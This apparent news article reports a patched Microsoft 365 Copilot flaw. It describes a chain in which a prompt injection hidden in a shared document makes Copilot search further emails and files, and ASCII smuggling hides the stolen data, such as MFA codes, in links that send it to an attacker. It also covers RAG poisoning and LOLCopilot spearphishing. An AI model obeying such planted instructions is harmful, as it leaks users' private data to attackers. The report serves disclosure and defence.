There has been news of a Microsoft 365 Copilot vulnerability that has subsequently been patched; however, it might still permit the theft of personal user information by using a method called ASCII smuggling.
Information has surfaced regarding a Microsoft 365 Copilot vulnerability that has since been fixed and may allow for the theft of private user data through the use of an approach known as ASCII smuggling.
Security researcher Johann Rehberger described ASCII smuggling as “a novel technique that uses special Unicode characters that mirror ASCII but are actually not visible in the user interface.”
This implies that a hacker may get the [big language model] to produce unseen data to the user and include it in hyperlinks that can be clicked. In essence, this method prepares the data for exfiltration.”
The complete attack combines several attack techniques to create a trustworthy chain of exploits. This entails taking the subsequent actions:
Use malicious material hidden in a document given over the conversation to initiate using a prompt injection payload to tell Copilot to go through further documents and emails.
Using ASCII smuggling to trick a user into clicking on a link that will allow the theft of important information from a third-party server
The attack’s ultimate result is the possibility of sending private information—such as multi-factor authentication (MFA) codes—to a server under the control of the adversary. Since then, Microsoft has dealt with the problems after making a responsible disclosure in January 2024.
The revelation coincides with the demonstration of proof-of-concept (PoC) assaults against Microsoft’s Copilot system, which highlights the necessity of continuously monitoring dangers associated with artificial intelligence (AI) technologies in order to influence answers, exfiltrate private data, and evade security measures.
The techniques, which Zenity describes in detail, enable malevolent actors to carry out indirect prompt injection and retrieval-augmented generation (RAG) poisoning, which can result in remote code execution attacks that can take complete control of Microsoft Copilot and other AI apps. In a best-case scenario, Copilot might be tricked into sending visitors to phishing pages by an outside hacker with code execution skills.
Making the AI a spearphishing machine is perhaps one of the most inventive attacks. Using a red-teaming technique known as LOLCopilot, an attacker can send phishing messages that imitate the style of a compromised user if they have access to the victim’s email account.
Microsoft has also said that, provided threat actors have prior knowledge of the Copilot name or URL, publicly accessible Copilot bots made with Microsoft Copilot Studio and without any authentication safeguards may provide a means for them to obtain sensitive data.
“Enterprises should evaluate their risk tolerance and exposure to prevent data leaks from Copilots (formerly Power Virtual Agents) and enable data loss prevention and other security controls accordingly to control the creation and publication of Copilots,” Rehberger stated.
Do Follow: CIO News LinkedIn Account | CIO News Facebook | CIO News Youtube | CIO News Twitter
About us:
CIO News is the premier platform dedicated to delivering the latest news, updates, and insights from the CIO industry. As a trusted source in the technology and IT sector, we provide a comprehensive resource for executives and professionals seeking to stay informed and ahead of the curve. With a focus on cutting-edge developments and trends, CIO News serves as your go-to destination for staying abreast of the rapidly evolving landscape of technology and IT. Founded in June 2020, CIO News has rapidly evolved with ambitious growth plans to expand globally, targeting markets in the Middle East & Africa, ASEAN, USA, and the UK.
CIO News is a proprietary of Mercadeo Multiventures Pvt Ltd.